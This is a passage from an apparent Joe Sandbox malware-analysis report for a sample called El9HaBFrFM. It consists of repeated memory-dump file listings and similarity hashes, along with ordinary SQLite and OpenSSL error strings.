                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254958100.00007FFDFA931000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFA930000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254926278.00007FFDFA930000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA97A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA988000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9D7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254958100.00007FFDFA9DF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255290926.00007FFDFA9E0000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfa930000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                                                                                                        • Instruction ID: a790f9ccd6bd2f40fd017df60e58d79c38b637f826c5df6bf70c5a3c406fe3da
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1143ce772416530538e6e632f3059b38426edc2ca8d0a1c1cafe6258f8b28d68
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02111C26B14B018AEB008F61E8656B933B4FB19758F840A35DA7D86BA8DF78D1A48340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                                                                                                        • Instruction ID: b5be59fc79f854b9e59ddfe0761b06d007c9d05bcaf2a02889803263b0ac3605
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c228ff487a8229492adc3f8944b6875e240ddca761839ed72b11deef452fc955
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9112132B14F0189EB00CFA0E8556B833A4FB19759F440E75DA6D87798EF78E1948340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 76e6d5358ccfd4d67dad92eb48791a992a72e30a35c3a726a8f86720c62717aa
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30110322B14B168AEB009F65E8542A973A4FB59758F440E31EF6DC67A4EF7CD198C340
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: out of memory$string or blob too big
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2410398255
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 1f37cdde795ac384665e2f36750e005d842ec1aae1df867e1dcbe8657fb66a29
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5fff3d06d0ccca3e7037c2f42f265a36d380444e00bc8815e5caa4a52cafd409
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23C1C162F0A6C386FB209A15C160B7C6BA1EF12B84F144235CB6E577F9DF2CE446A350
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_asn1.c$d2i_SSL_SESSION
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-384499812
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 13249d70c78833e27b888f2b452752125fd81509b419a72801f12e0ee38f37c6
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a5271567f02ba352d921ff3c4e2fac1e9ecca7785b90009fd4beffc7ef3d7b0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20D15D32B08B4292EB59DF25D5A0AB933A4FB44B84F458076DE6C477D9DF38E466C310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\ssl_sess.c$ssl_get_prev_session
                                                                                                                                                                                                                                                                                                                        • API String ID: 3568877910-1331951588
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ba1759f32b4308751b6667a09460a46e98e5c8fc7fd6a75e7fdf32a2e55392e1
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e391f8e95c0f4977e9b0a03ed3c244edb74b16920bfda910dd9f54047f92028c
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AC18F22B0868282E76D9B21D564BBE7390FB84B88F444176DEAD477D9CF3DE45AC310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-515162456
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ddb5c7676994126754628fd50cdf6aec016fe4f1c04503265d8febc4cf62d5f3
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 506eda038b74c98e54bdfa24872a0cb727f6532326f914921bbb369657e19773
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B3817AB3F0A65B85EB109B11E464AB977A5FB54BC8F498031DE9C476E8EF38E541C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: BINARY$no such collation sequence: %s
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-2451720372
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 72ea4b5d8bc196bbd9e391c20ff4b8a0691c10f72898a26c51fdad5ede3bd345
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 282f0509ea81868ca59e037c5a34fc49bde5b1738b0b20af94cc3273fb71deb0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D719D62F1AA8291EF189F218560BB96390EF55BA8F485331DE3D072E9DF3CE195C340
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                        • String ID: index '%q'
                                                                                                                                                                                                                                                                                                                        • API String ID: 0-1628151297
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
                                                                                                                                                                                                                                                                                                                        • Instruction ID: d2fbc28e43ac4afc4ec31e68a6921b0e70dc310b9c4263838f252615f9e54599
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ae049488dbcd971e8eebbb9c46ca1a513fddf04584e929c695a7bee5a319a09
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66717D77F1965689EB109B69D860EBC3BA0FB48B9CF140635DE2E57BE8DB389441C700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFB0C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257575538.00007FFDFB0C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB221000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB223000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257648942.00007FFDFB238000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257919759.00007FFDFB23A000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfb0c0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007E13343010
                                                                                                                                                                                                                                                                                                                        • String ID: %02d
                                                                                                                                                                                                                                                                                                                        • API String ID: 2142204133-896308400
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 66d19db4c94e41739ae7fc9497550fa7134b403c301fcb509d85c895b875a03e
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87c9a3707543ebd0ec8a97f1e757cf13622c6e6cbfda3e3733a9ffa452fb5cd0
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E871AAB6B1969385EB608B68E461ABD7B60FB85748F104031EE9D13AEDDF38E445DB00
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2255396012.00007FFDFAAB1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAAB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255362618.00007FFDFAAB0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB33000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB35000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB68000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255396012.00007FFDFAB73000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255816523.00007FFDFAB77000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ffdfaab0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: 00007B6570
                                                                                                                                                                                                                                                                                                                        • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                                                                                                                        • API String ID: 4069847057-118859582
                                                                                                                                                                                                                                                                                                                        • Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                                                                                                        • Instruction ID: 8a60a4ad368d3185b4f5c48337a9f9331964d2854c4621aeb214c24b35907888
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C51D425B0C24245FB599765A824BB96390AF45BC4F9840B2DE3D477DEDF3CE8479310
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.2254659746.00007FF6BA3A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BA3A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254626360.00007FF6BA3A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254734938.00007FF6BA3CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254775631.00007FF6BA3E1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.2254842079.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_7ff6ba3a0000_El9HaBFrFM.jbxd
                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                                                                                        • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca5cb5ad417d3bb251627e950f2dad7a2e7761b76c1909dad9a2ef81bbb3bdd3
                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA411622A087A246FB648B29E80137A6B61EF80BA4F144275EF5DC7AD6EF3CD4418700
                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BA3B9046
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: HeapFree.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA95E
                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6BA3BA948: GetLastError.KERNEL32(?,?,?,00007FF6BA3C2D22,?,?,?,00007FF6BA3C2D5F,?,?,00000000,00007FF6BA3C3225,?,?,?,00007FF6BA3C3157), ref: 00007FF6BA3BA968
                                                                                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6BA3ACBA5), ref: 00007FF6BA3B9064
                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                        Memory Dump Source
